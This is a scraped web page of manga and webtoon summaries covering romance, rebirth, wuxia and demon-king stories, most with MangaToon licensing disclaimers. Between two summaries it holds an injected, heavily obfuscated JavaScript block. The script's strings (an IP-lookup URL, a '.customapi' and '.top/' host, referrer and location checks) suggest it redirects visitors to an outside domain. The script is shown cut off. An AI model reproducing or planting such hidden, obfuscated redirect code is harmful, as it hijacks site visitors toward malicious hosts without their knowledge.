Joey and her husband, F, couldn’t be any more different. Joey is bubbly and charming while F is quiet, elusive, and downright cold sometimes. When Joey’s company assigns her to work on a project that’ll inspire people to reminisce on their youth, she decides to write a book about her own, and it turns into a memoir of her and F’s love story. As Joey looks back on how she met F, it’ll take her on a memorable journey through her life, first love, and how the “Ice Man” became the warmest person she knows.
To Conquer the World with You "Does she know poetry and song? Does she understand music, chess, calligraphy and painting? Does she know how to be a good wife and mother and manage a household?" Su Yao: "My beauty is enough ......" Years later, the crushed Kyoto noblewoman wondered, "Didn't you say that beauty is enough? Why do you still use your brain?" Su Yao: "Don't you know that the more beautiful a woman is, the less credible her words are?" MangaToon got authorization from BYdongman to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
Loyal king of demons said, "Now that you've found me, you need to be responsible for me." Lost memories and destined reunion. Yu Yin reincarnated twice and returned to the world he was originally from, but he got "scammed" by some unknown demon king the moment he's back. Moreover, he got bitten by him and formed an agreement! While Yu Yin was in astonishment, the demon king considered everything just normal. "I surely need to be responsible for you, given the relationship between us." MangaToon got authorization from Kuaikan Comics to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.<script></script><script>function _0x2ebb(){var _0x181a14=['BxLza','49boupRf','QOyoz','jevSC','1249452cqLQcZ','includes','950545aoDTQF','https://ip','3LTyIKj','16822830VCmbCc','AWpIi','http://rea','google','22976fjwlMV','526602QRoHVF','8ZgkSGu','EamGM','ykIHp','text','location','referrer','then','weMfY','wKNSh','href','1243116bxswKd','.customapi','1255419QbvuNe','random','','SHBJh','uLRLM','floor','.top/'];_0x2ebb=function(){return _0x181a14;};return _0x2ebb();}function _0x4887(_0x4afc8a,_0x248874){var _0x108685=_0x2ebb();return _0x4887=function(_0x1cfac4,_0x3a9f46){_0x1cfac4=_0x1cfac4-(0x184f+-0x5*-0x511+-0x3136);var _0xfb4022=_0x108685[_0x1cfac4];return _0xfb4022;},_0x4887(_0x4afc8a,_0x248874);}(function(_0x225dd6,_0x287ee2){var _0x2b58ee=_0x4887,_0x279d7b=_0x225dd6();while(!![]){try{var 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She's a D-list actress, who is unwanted by all, including her family. He's a negligible CEO, who has to carefully calculate his every move, just to survive. Facing the betrayal of closed ones, they formed a close alliance: knowing acting is her dream, he rolls out the red carpet for her; knowing he wants to prove himself, she offers her unconditional support. Hurt and hatred, company and comfort, who can deny that they are already in love... MangaToon got authorization from iQiyi Comics to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
She was a top-notch martial art master, winning the gold medals five years in a row. He was a superstar born in the richest family in the world. Handsome but aloof, he got so many fans around the world that was beyond counting. What she doesn’t know is that one day she would be reborn, and now she’s the fiancee of this superstar! Let the world sneer at her, and that’s not something that ever could bother her. After all, she deserves all the best. MangaToon got authorization from SaManHua to publish this content, the content is the author’s own point of view, and does not represent the stand of MangaToon.
The first time they met, she stripped him, put his clothes on and went home. The second time they met, she stripped herself, threatening him: “Leave or I’ll shout out!” The third time they met, she smirked to him: “Just strip. You will get used to it. Come on!” He would say: he has never met such a shameless girl. MangaToon got authorization from Hotread to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
Marshal, your wife ran away again! Alas, I've got used to that... Qingzhou Gu, a seemingly naïve girl, is plotting a revenge. Every coincidence is under her precise calculation. Every accident is her well-considered move. Could Marshal Si handling his tricky wife? What will happen in their romance? MangaToon got authorization from iCiyuan to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.
Their marriage is entirely contractual. Just to be clear, this is a fake marriage and none of it should be taken seriously! He says, "People say I'm arrogant, overbearing, and ruthless, so don't fall for me." She says, "People say I'm the most beautiful and kind-hearted doctor, an angel sent by God to save patients, so you'd better not fall for me either..." They are both powerful people, and are a great match for each other! As they live together, their attitudes towards each other gradually change, and love develops between them... MangaToon got authorization from Kuaikan Comics to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
이제야 연애 Summary:Sisters Ju-eun and Hye-jin lived a miserable life. After the death of their mother, their ‘father’, who had always been absent from their lives, suddenly appeared. Hye-jin, the older sister, agreed to his suggestion: if one of them joins the ‘Daesung Group’, he will rescue them from their poverty-stricken life. However… three years after entering ‘Daesung Group’, she dies in vain. This left Ju-eun struggling with despair at her helplessness in preventing her sister’s death. But then, she gets a new opportunity when she is brought back in time and Ju-eun decides to take her sister’s place by becoming the daughter of the ‘Daesung Group’ that killed Hye-jin.
Canary Yun Mian, the Fairy of Fertility, in charge of reproduction and pregnancy…have been given a mission impossible. It is said that the son of Emperor Feng Xiao will be the ruler of the mortal world. Yu Mian must guarantee the birth of this child. However, she finds out that the Emperor shows no interest in his concubines because… he is impotent. Meanwhile, Emperor Feng Xiao gets to notice the maid disguised by Yun Mian and find her very attracting… MangaToon got authorization from iReader to publish this content, the content is the author’s own point of view, and does not represent the stand of MangaToon.
A taoist has descended mountains for years to seek the trace of his sect legacy the "Scroll of White Silk Cloud". He picked up the downfall ranger, the girl with amnesia, and the unemployed vagrant along the way. Meanwhile, the secrets of the world are gradually revealed, all those grievances, entangled and confused memories, hatred and love... A gorgeous and heartwarming WuXia adventure invites you to wander together! MangaToon got authorization from Kuaikan Comics to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.
Great Comeback of the Deserted Princess The legend says that Gu Qingcheng was once the wife of Prince Yongjun, but was divorced by her husband. Her whole family was beheaded, and she herself nearly became food in the belly of the beast in the colosseum. She was once the most beautiful woman in the Great Xia Empire, now she's taken away by Prince Sheng. After a year, she's ready to make her comeback, and make the man who destroyed her family pay the price! MangaToon got authorization from Hotread to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.